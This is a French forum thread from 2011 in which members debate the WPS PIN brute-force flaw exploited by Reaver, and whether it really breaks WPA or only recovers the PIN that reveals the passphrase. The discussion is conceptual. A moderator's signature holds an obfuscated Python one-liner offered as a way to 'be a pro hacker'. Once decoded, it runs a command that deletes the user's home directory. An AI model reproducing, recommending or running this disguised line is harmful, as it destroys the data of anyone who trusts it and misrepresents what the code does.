Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 30-12-2011 01:29:28

peripetie
Nouveau membre
Lieu : Rhône-Alpes de l'ouest
Inscription : 16-12-2011
Messages : 5

Ca progresse vite !

Yep les potos !


Ca crack du WPA en moins de 24 heures selon Zataz !!

Dernière modification par peripetie (30-12-2011 01:32:30)


"Le secret du bonheur n'est peut-être pas forcement de faire ce que l'on aime mais plus sûrement d'aimer ce que l'on fait"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 30-12-2011 22:35:47

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 356

Re : Ca progresse vite !

Il ne s'agit pas de cracker du WPA, mais de récupérer la passphrase en utilisant une faille dans la fonction WPS, on en a parlé ici: Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack.

Hors Ligne

#3 30-12-2011 22:45:02

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Ca progresse vite !

M1ck3y a écrit :

Il ne s'agit pas de cracker du WPA, mais de récupérer la passphrase en utilisant une faille dans la fonction WPS, on en a parlé ici: Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack.

Objection votre Honneur ! La technique ne récupère pas la passphrase WPA, elle récupère le code PIN à 8 chiffres qui permet de "court-circuiter" l'association en évitant de devoir taper la vraie passphrase (qui peut alors être bien complexe).

Bon, le résultat est le même (l'attaquant accède au réseau) et la passphrase peut généralement être récupérée via l'interface d'administration du point d'accès, mais la nuance est quand même là smile

Hors Ligne

#4 30-12-2011 23:08:21

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 356

Re : Ca progresse vite !

Oui enfin tu m'as compris, on se connecte en exploitant la faille WPS, et une fois sur le réseau on récupère la passphrase dans l'interface d'admin du routeur, ou avec d'autres techniques de phishing ou autre, une fois connecté au réseau ce ne sont pas les méthodes qui manquent. On va dire que dans 90% des cas la récupération de la passphrase n'est qu'une formalité une fois connecté au réseau.

Il est important d'expliquer que WPA n'a pas dit son dernier mot, contrairement à tout ce qu'on peut lire en ce moment. J'ai vu des articles qui ne veulent rien dire: "Il ne fait pas bon crypter son routeur Wi-Fi en WPS" ou encore "Un outil pour cracker le WPA en 10 heures". On ne casse pas une passphrase WPA en 10 heures, sauf si elle est constituée exclusivement de chiffres, qu'elle ne fait pas plus de 8 caractères de long et qu'on a du gros GPU pour la bruteforcer; ou bien si elle figure dans les wordlists d'un cracker online et qu'on y envoie le handshake. WPA est encore solide, qu'on se le dise!

Hors Ligne

#5 30-12-2011 23:16:47

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Ca progresse vite !

M1ck3y a écrit :

Il est important d'expliquer que WPA n'a pas dit son dernier mot, contrairement à tout ce qu'on peut lire en ce moment.

Voilà précisément pourquoi je voulais préciser, sinon dans 2 jours on va (encore) nous annoncer que le WPA2 est mort et que c'est la fin du monde (sans fil) smile

C'est un détail, certes, mais c'est ce genre de détail qu'il faut souligner si on veut éviter (enfin disons limiter) les amalgames et autres raccourcis techniques dont certains journalistes sont friands wink

Hors Ligne

#6 30-12-2011 23:40:13

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 356

Re : Ca progresse vite !

Cela dit, si le tool ne récupère pas la passphrase alors ça y ressemble quand meme méchamment, regarde la vidéo: Cracking WPS with Reaver cool

Hors Ligne

#7 31-12-2011 12:43:27

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Ca progresse vite !

Au temps pour moi, à voir la vidéo je me dois de revoir mon jugement. Il y a un point que j'ignorais : la norme WPS précise que une fois que la station a envoyé le bon PIN, le point d'accès lui répond "OK bienvenue au club, tiens voilà la passphrase comme ça tu peux l'utiliser directement" >_<
facepalm.gif
Ça l'auteur n'en parlait pas dans son "article" de 9 pages d'où ma remarque mal placée (mes confuses, tout ça...) roll

Je serais tenté de hurler "Mais ils le font exprès ou quoi ?!" tellement les choix faits par les concepteurs semblent foireux, mais il faudrait que je regarde s'il y a moyen de transmettre au client directement les clés de session sans la PSK. Ils ont peut-être pas le choix en fait... hmm
J'en reviens quand même pas qu'une norme puisse permettre de remplacer complètement une PSK solide par un pauvre PIN à 7 chiffres (oui, le 8ème est un checksum calculé à partir des précédents) mad

Maintenant, je peux aussi faire preuve d'énormément de mauvaise foi et je le prouve !
- je parlais bien de la technique et pas du tool, cette technique ne sert qu'à récupérer le PIN (pas de ma faute si l'AP amène la PSK sur un plateau juste après)
- on ne cracke pas la passphrase avec cet outil, on la récupère simplement.

[small](j'aurais pu être avocat moi)[/small]

Hors Ligne

#8 31-12-2011 14:57:47

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 356

Re : Ca progresse vite !

Tu peux sauter d'un avion sans parachute, tu finiras toujours par trouver une branche à laquelle t'accrocher! lol

Au moins ça nous permet de mieux comprendre les mécanismes de cette fonctionnalité "pseudo secure" que je n'ai pour ma part jamais utilisé jusqu'ici. En tout cas ça fait un max de buzz sur le web, comme à chaque fois qu'une faille concernant le wifi est rendue publique.

Hors Ligne

#9 07-02-2012 12:11:18

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Ca progresse vite !

[troll]
ALKEMADE Nicholas - Sergent / Mitrailleur - Squadron 115 RAF - 24 mars 1944 - 6000 mètres sans parachute. (article sur cieldegloire.com)
[/troll]


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 782 10-10-2011 12:30:11 par SecuObs.com

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.037 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]